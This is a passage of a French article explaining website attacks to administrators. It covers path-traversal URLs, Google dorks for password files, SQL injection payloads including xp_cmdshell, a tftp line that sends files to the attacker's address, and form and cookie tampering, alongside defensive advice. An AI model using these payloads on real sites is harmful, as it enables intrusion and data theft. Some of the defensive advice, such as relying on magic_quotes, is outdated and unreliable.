Et voici l’URL qui affichera le fichier win.ini si le serveur tourne sous Windows depuis le répertoire C:\ Inetpub\wwwroot\ :

http://www.monsite.com/../../WINNT/win.ini

Cela dit, la plupart des serveurs (tout du moins Apache et Microsoft IIS) sont désormais protégés contre cette faille, mais si vous ne disposez pas de la toute dernière version, alors il est possible que votre configuration ne puisse lutter contre cette subtile variante qui consiste à indiquer “ ../ ” avec des caractères échappés. L’URL suivante est similaire à la précédente, mais elle réussit plus souvent :

http://www.monsite.com/%2e%2e%2f%2e%2e%    "
    2fWINNT/win.ini

Si cela échoue, le pirate pourra tester la même faille sur la logique applicative de votre site, car vous n’avez peut-être pas pensé à protéger vos scripts ni même l’interpréteur de commande qui les exécute (quand le compte utilisateur qui lance ces outils a trop de privilèges). Imaginons par exemple que vous ayez prévu un programme “ selectionne.asp ” qui choisit une page à afficher grâce à l’URL :

http://www.monsite.com/selectionne.asp?    "
    item=page.html
On fait de même que précédemment avec encore plus de chances de réussites en tapant :

http://www.monsite.com/selectionne.asp?item=    "
    ../../winnt/win.ini
Et puisque nous en sommes à parler d’exécutables, pourquoi ne pas directement lancer ceux du système d’exploitation hôte ? Voici par exemple comment afficher le contenu de la racine du disque dur grâce à la commande “ dir ” exécutée par le Shell de Windows (“ cmd.exe ”) :

http://www.monsite.com//../../winnt/system32/    "
    cmd.exe?/c+dir+c:\

Remarquez que nous avons utilisé ici la notation Unix “ ../ ” pour remonter d’un répertoire, puisque la plupart des applications réseau de Windows la reconnaissent désormais. Nous aurions tout aussi bien pu écrire “ ..\ ” (soit %2e%2e%5c en caractères échappés).
Ne laissez rien traîner dans les répertoires de votre site

Sans sortir des frontières de votre site Web, le pirate peut également trouver des informations utiles dans les répertoires qui le composent. Dans la foulée des exemples précédents, on peut ainsi commencer par lire le code source des scripts applicatifs plutôt que de les lancer. Il suffit de taper (pour le cas de “ selectionne.asp ” que nous avions cité plus haut) :

http://www.monsite.com/selectionne.asp?item=    "
    selectionne.asp

Pour peu qu’il soit abondamment commenté, ce code source révèlera souvent l’architecture de votre site, l’endroit où chercher des informations intéressantes. On pense typiquement aux données qui concernent les clients d’un site marchand (le pirate pourra faire ses courses aux frais de quelqu’un d’autre) ou encore qui ne peuvent se consulter que si l’on a payé pour cela (le pirate saura alors les récupérer sans pour autant s’être acquitté des droits d’entrée).
Évidemment, en tant qu’administrateur consciencieux, vous aurez pris soin de vérifier que la lecture directe des répertoires est interdite à vos visiteurs (par défaut dans Apache et dans les dernières versions de Microsoft IIS ; cela dit, préférez l’existence systématique d’un fichier “ index.html ”, pour faire meilleure impression à vos visiteurs). Las ! Les pirates connaissent les habitudes des créateurs de sites, notamment leur manie de laisser traîner des fichiers de développement ou d’administration, inaccessibles depuis un lien, certes, mais parfaitement consultables si on devine leur URL. Parmi les poncifs, nous avons le script phpinfo.php3 qui, lorsqu’on l’exécute, liste les caractéristiques du serveur (on y accède souvent en tapant une adresse du style http://www.monsite.com/admin/phpinfo.php3 ), ou encore les copies de sauvegarde qui ont été générées lors du développement du site et qui comportent l’extension “ .bak ”. Cette dernière court-circuitera aux yeux du serveur la reconnaissance de l’extension qui précède (“ .php ”, “ .jsp ”, “ .asp ”, etc.), ce qui implique que le script ne sera pas exécuté. À la place, le serveur vous livrera son code source. S’il ne trouve pas de copie “ .bak ” d’un script, le pirate tentera souvent de regarder s’il n’y en a pas dans un éventuel répertoire “ test/ ”, voire “ base/test/ ”.



Google, le faux ami des pirates
Le saviez-vous ? Le moteur de recherche Google dispose de tout un éventail de mots-clés pour trouver avec une précision déconcertante des recoins de sites Web qui correspondent à certaines caractéristiques. Par exemple : intitle:"Index of" ... listera les répertoires en ligne dont on peut consulter le contenu. Évidemment, on affinera cette requête en ajoutant – de manière traditionnelle – les termes qui évoquent les fichiers que l’on recherche et que les webmasters ont oublié de cacher : intitle:"Index of" .htpasswd backup finance xls Il existe des variantes : “ inurl: “ demandera que la requête s’effectue dans l’URL de la page, “ allintitle: “ ainsi que “ allinurl: “ chercheront tous les termes dans le titre et l’URL de la page. Cela marche même avec les protocoles (identifiés par leur numéro de port). Par exemple, voici comment trouver des machines que l’on peut piloter à distance : intitle:"VNC Desktop " inurl:5800 Google serait-il l’arme absolue des pirates ? Voire ! S’il parvient à afficher toutes ces informations, c’est que celles-ci ont été volontairement référencées. Or, les webmasters ne sont pas à ce point négligents. Dans la plupart des cas, les liens de ce genre qui apparaissent un peu trop facilement sont des “ honey pots “ (ou pots de miel), à savoir des leurres (les sites ne sont effectivement pas protégés mais n’ont aucune information intéressante) pour attirer les pirates du dimanche et enregistrer leur adresse IP.




Quand le pirate veut obtenir vos privilèges

Les fichiers d’administration n’échappent pas à la règle. Ceux-ci définissent typiquement quels utilisateurs référencés sur le serveur Web (il ne s’agit pas des utilisateurs du système d’exploitation) ont le droit de faire quoi (au sens des fonctions du protocole HTTP, tels “ GET ”, “ POST ”, etc.) sur votre site Web. Il en va par exemple ainsi des extensions de FrontPage, l’outil de création de sites Web de la suite Microsoft Office. Celui-ci génère des répertoires fonctionnels “ _vti ” (“ _vti_pvt ”, “ _vti_auth ”, etc.) qui contiennent des fichiers texte listant les identifiants et les mots de passe des personnes ayant le droit de modifier le site Web. Il s’agit notamment des fichiers “ service.pwd ” (sur le serveur Microsoft IIS), “ administrators.pwd ”, “ authors.pwd ” ou encore “ users.pwd ” (sur le serveur Apache). Ces fichiers sont lisibles par un pirate qui aura su deviner leur URL, ou pis, qui aura tout simplement demandé à Google de les lui trouver ! Eh oui, FrontPage a, à un certain moment, présenté le grave défaut de provoquer le référencement de ces fichiers critiques par les moteurs de recherche ! Entrez simplement “ inurl:service.pwd ” dans Google pour constater combien de serveurs offrent au public les clés de leur site !
En ce qui concerne le serveur Web Apache, on trouve un fichier “ .htaccess ” qui définit les droits pour chaque répertoire de votre site et un “ .htpasswd ” qui contient la liste en clair de tous les utilisateurs référencés sur le serveur accompagnés de leur mot de passe (souvent chiffré en DES, mais le logiciel John The Ripper devrait en venir à bout assez rapidement). Si “ .htaccess ” reste inaccessible du Web (même si le pirate entre une URL correcte), il n’en va hélas pas de même pour “ .htpasswd ”. Ce dernier pouvant changer de nom à la discrétion du webmaster, il faudra le protéger manuellement, ce que l’on oublie régulièrement de faire. Deux cas se présentent : il y a ceux qui oublient de placer un fichier “ .htaccess ” dans le répertoire qui contient “ .htpasswd ” et ceux pour lesquels les fichiers “ .htaccess ” ne fonctionnent pas car ils ont laissé la mention “ AllowOverride None ” dans leur fichier “ httpd.conf ” (la mention correcte est “ AllowOverride ALL ”).
Si, en entrant des URL plus ou moins hasardeuses sur votre site, le pirate parvient à lire le contenu de vos fichiers d’administration, alors il disposera des identifiants et mots de passe nécessaires pour accéder aux informations confidentielles, et remplacer vos pages par les siennes (sorte de cyber-vandalisme que l’on appelle le “ defacing ”), voire mettre ses scripts à la place des vôtres. Dans ce dernier cas, nous vous laissons imaginer les crimes qu’ils pourraient commettre sur votre dos, notamment se servir de votre machine pour aller, incognito, en attaquer d’autres sur Internet.



Connaître l’infrastructure d’un site Web
L’utilisateur d’un système Unix (Linux, Mac OS X…) dispose d’une panoplie de commandes pour connaître les informations légales relatives à un site Web. Pour commencer, “ whois ” listera assez richement la raison sociale de la société qui se trouve derrière un site, avec son adresse, les coordonnées des personnes à contacter (e-mail, téléphone…), ainsi que toutes les informations connues de son hébergeur. Nous trouvons ensuite “ host ” qui nous donne son adresse IP, “ host -t ns ” qui affiche le serveur DNS qui maintient le nom de domaine ou encore “ host -t mx ” qui indique l’adresse du serveur de courrier électronique par lequel passent les personnes dont l’adresse e-mail a le même nom de domaine que celui du site. À noter qu’un “ host ” pourra livrer le nom de la machine sur laquelle fonctionne le site, laquelle peut-être située – surprise – chez un autre hébergeur que celui précédemment trouvé.


p.2
Réduire
Il modifiera votre site de la même manière que vous le faites, c’est-à-dire en y accédant à partir d’un navigateur de fichiers grâce à une adresse du style ftp://utilisateur: motdepasse@www.monsite.com (mode FTP) ou encore http://utilisateur:motdepasse@ www.monsite.com:80 (mode WebDAV). À ce stade, il reste encore possible de l’empêcher de nuire. Pour commencer, coupez l’accès WebDAV. Ce dernier étant une extension du protocole HTTP, il perdra toute sa sécurité en même temps que votre serveur Web, puisqu’il s’agit d’une seule entité. Éditez plutôt votre site sur une machine autre que le serveur, puis ne téléchargez sur celui-ci – en FTP – que les documents destinés à vos visiteurs, pas les fichiers de développement. Le FTP présente l’intérêt d’utiliser les droits des utilisateurs du système d’exploitation, c’est-à-dire pas les identifiants et mots de passe du serveur Web potentiellement piraté. Évidemment, la situation est d’autant meilleure si vous disposez d’un accès FTP privé sur la machine qui héberge le serveur Web (c’est-à-dire que le service FTP n’est pas ouvert aux adresses IP publiques), soit parce que vous passez par un réseau local, soit au moyen d’un VPN.  


Au-delà du serveur Web, l’injection SQL

L’histoire des piratages de sites Web ne s’arrête pas là, car plus ces derniers présentent de fonctions, plus l’éventail de leurs failles est susceptible de s’élargir. Il en va ainsi d’un site Web professionnel qui renferme un peu de logique applicative, c’est-à-dire où les pages renvoient à des moteurs logiciels (écrits en PHP, ASP.NET, JSP…), lesquels invitent l’internaute à saisir des données dans des cellules et, selon les informations saisies, à puiser une réponse au sein d’une base de données (de type SQL, MySQL, etc.). Un grand classique du piratage, appelé “ injection SQL ”, consiste à entrer dans les cellules des commandes compréhensibles par la base de données au lieu des informations attendues. Typiquement, le code applicatif peut, à un moment donné, lister certaines données confidentielles si l’utilisateur a entré des informations valides (tels son identifiant et son mot de passe). Cela se traduit, dans les rouages de votre site, par quelque chose du style :

SELECT cartedecredit FROM tableau WHERE     "
    nom=’$login’ AND motdepasse=’$pass’


Ici, $login et $pass sont des variables qui valent ce que l’utilisateur aura entré à l’aide de son clavier dans les cellules de la page. Mais, à la place des informations attendues, le pirate saisira un code qui rendra le test toujours valide, tel :

 
‘ OR ‘1’=’1

La base de donnée se trouvera alors face à la requête suivante :

SELECT cartedecredit FROM tableau WHERE nom=     "
    ‘’ OR ‘1’=’1’  AND motdepasse=’’ OR ‘1’=’1’


Ce qui signifie, en français : « utiliser dans le tableau la carte de credit qui vérifie que le nom est rien ou que 1=1 et que le mot de passe est rien ou que 1=1 ». Comme “ 1=1 ” est toujours valide (toujours vérifier), la base de données ne sachant pas quelle « cartedecredit » sélectionner les prendra toutes et n’utilisera que la première de la liste lors d’une requête ultérieure. Et voilà comment notre pirate fera ses achats gratuitement sur votre site commerçant. Cet exemple se décline presque à l’infini avec toutes les possibilités qu’offrent les mots-clés des bases de données. Citons “ -- ” (“ tout ce qui suit est un commentaire ”, pour par exemple entrer un identifiant existant sans vérifier son mot de passe), “ > ‘/chemin/carte2credit. txt’ ” (“ copier le résultat de la recherche dans le fichier /chemin/carte2credit.txt sur le serveur Web ”, le fichier pouvant ensuite être récupéré par le pirate en entrant son adresse dans le navigateur), ou encore “ DROP TABLE tableau ” (détruit toute la table “ tableau ” du serveur !). Pis, Microsoft SQL reconnaît même la forme “ EXEC master..xp_cmdshell <commande> " qui demande à Windows d’exécuter une commande DOS ! Dans ce cas, le pirate peut tout faire : lire le contenu du disque dur (dir), connaître les utilisateurs référencés sur la machine (net user), effacer des fichiers (del), les consulter (type), voire les rapatrier vers son ordinateur (tftp -i <adresse.IP.du.pirate> put <nomdufichier>).
Pour empêcher de tels méfaits sur un moteur PHP, il suffit juste d’interdire l’utilisation des caractères ‘ et “ dans les réponses des requêtes, ce qui se fait en définissant “ magic_quotes_gpc = yes ” au sein du fichier php.ini. Cette facilité n’existe pas en ASP ou JSP, il faudra donc que le code analyse ce que l’utilisateur a saisi avant de l’envoyer à la base de données. L’analyse devra typiquement porter sur le nombre de caractères entrés, l’interdiction des apostrophes et autres guillemets, voire l’utilisation de chiffres uniquement.


Les outils qui protègent votre site
Présenté comme un successeur de Tripwire, AIDE (Advanced Intrusion Detection Environment) surveille les fichiers de votre site et prévient toute tentative de vouloir les modifier. Sous licence GPL, il se télécharge gratuitement à l’adresse http://sourceforge.net/projects/aide. Il fonctionne sur tous les Unix et sur Windows au travers de l’environnement Cygwin. Tout autant Open Source, Snort s’installera sur la machine routeur ou directement sur celle qui fait tourner le serveur Web. Son propos consiste à analyser chaque paquet entrant et à rejeter toute attaque connue. Fonctionnant sur Linux, Windows et Mac OS X, on peut le télécharger gratuitement sur http://www.snort.org/dl/. Idéalement, on le combinera avec la base de données ACID (http://www.andrew.cmu.edu/user/rdanyliw/snort/snortacid.html). Dans le même genre, on trouve mod_security, lequel se greffe à un serveur Apache (http://www.modsecurity.org/download/).




La falsification de requêtes...

Les données que saisit l’utilisateur dans une page Web sont souvent envoyées au serveur Web par la requête d’une nouvelle URL qui comprend en clair les valeurs entrées (éventuellement à la suite d’un point d’interrogation). Ceci correspond à la commande HTTP “ GET ” et il est aisé pour le pirate de modifier manuellement cette URL pour accéder à des données que ne lui avait pas forcément proposées la page qu’il visualisait. Il peut s’agir d’un document qui n’apparaissait pas dans une liste où l’on pouvait cliquer à la souris ou, pis, d’un numéro de session qui ne correspond pas à l’utilisateur en cours. Ce dernier cas se rencontre fréquemment avec les envois de cartes virtuelles : vous recevez un e-mail avec un lien qui pointe vers une session d’un site où se trouve la carte (en Flash...) qu’un ami a élaborée pour vous. Si vous modifiez le numéro de session dans l’URL, vous visualiserez les cartes destinées à d’autres personnes.
Sur le Web, il existe une alternative pour contourner le problème de l’URL : la commande HTTP “ POST ” envoie en temps réel au serveur l’information que l’utilisateur sélectionne. Mais la méthode n’en est pas pour autant plus fiable si le webmaster l’utilise à la légère. Prenons l’exemple d’un site bancaire qui propose sur l’une de ses pages une fonction de transfert d’argent. Ici, l’utilisateur doit sélectionner celui de ses comptes en banque qu’il faut débiter et entrer le numéro de compte vers lequel il souhaite effectuer le virement. Le tout est envoyé en temps réel à un programme “ transfert.asp ” qui traite la demande et, éventuellement, se chargera tout seul de générer une nouvelle page pour annoncer la réussite de la transaction. Le serveur connaissant les numéros de compte de l’utilisateur (parce qu’il s’est identifié auparavant), il les propose directement dans la page qu’il génère, notamment au sein du module de sélection, lequel pourrait correspondre au code HTML suivant :

<FORM METHOD=POST ACTION="transfert.asp">
Compte source : <SELECT NAME="CptSrce">
<OPTION VALUE="123456789">******789</OPTION>

<OPTION VALUE="868686868">******868</OPTION>
</SELECT>
<BR>Montant : <INPUT NAME="Montant" SIZE=20>

<BR>Compte destination :     "
    <INPUT NAME="CptDest" SIZE=40>
<BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
</FORM>


Que peut faire le pirate ? Éh bien, tout simplement éditer le code HTML de la page et ajouter, dans les options disponibles, un numéro de compte en banque qui n’est pas le sien ! Il lui suffit ensuite de recharger la page depuis son propre disque dur, de sélectionner le compte victime en guise de source et d’entrer un numéro de compte bien à lui pour la destination du virement. De son côté, l’applicatif ASP, qui n’a absolument pas connaissance de l’identité de l’utilisateur, effectuera le virement parce que son programmeur ne s’est pas demandé si la seule identification de l’utilisateur en début de navigation était suffisante.


Entraînez-vous à pirater un site !
Quoi de mieux pour devenir un expert de la sécurité que d’apprendre à pirater soi-même des sites Web ! Encore faut-il le faire en toute légalité. Tel est justement le propos de HackThisSite.org (http://www.hackthissite.org), lequel propose de manière pédagogique des pages à hacker dans sa rubrique « challenges ». Le niveau des défis va de l’attaque basique jusqu’à la programmation de scripts offensifs.




... et la falsification de cookies

Dans le cadre d’un site applicatif, l’attaque ne vient pas forcément des seules données entrées manuellement par l’utilisateur. Elle peut également provenir d’un cookie falsifié. Pour mémoire, le cookie est une liste de valeurs que le programmeur du site enregistre directement sur le disque dur du visiteur afin de stocker les paramètres de sa session. Cela simplifie le code, dans le sens où le serveur n’a qu’à lire le cookie pour se remémorer l’historique des actions effectuées depuis le début de la visite, le navigateur Web de l’utilisateur expédiant cette fiche avec chaque nouvelle requête. Problème, certains programmeurs abusent de la facilité, allant jusqu’à stocker en clair chez l’utilisateur le maximum de paramètres. Voici par exemple le cookie que pourrait générer un site marchand :

SESSIONID=564828ATDS45465931 ; Panier=3 ;     "
    PrixObjet1=149 ; PrixObjet2=239 ; "
    PrixObjet3=1299 ; PrixTotal=1687

Dans cet exemple, l’utilisateur n’a qu’à modifier les valeurs de tous les prix cités pour bénéficier d’une ristourne magique. Il lui suffit, avant d’appuyer sur le bouton “ Acheter ”, de prendre son éditeur de texte favori et d’ouvrir le cookie qui porte le nom <utilisateur>@<nom du site> (sous Windows, par exemple, les cookies logent dans le répertoire C:\Documents and Settings\<utilisateur>\Cookies\). La fraude sera très difficile à repérer en comptabilité et votre programmeur aurait mieux été inspiré de ne stocker dans le cookie que des numéros de références vers des variables conservées sur le serveur.


Les sites que consultent les hackers francophones
Le site francophone le plus complet concernant la sécurité des sites Web est sans conteste Zataz, lequel existe aussi bien sous forme strictement pédagogique (http://www.zataz.net, avec documentations et services) qu’en tant que portail sur le monde du hacking (http://www.zataz.com, avec actualités, liens et téléchargements). Citons également Zone-H (http://www.zone-h.org), site international qui fait l’effort de traduire moult de ses articles en français.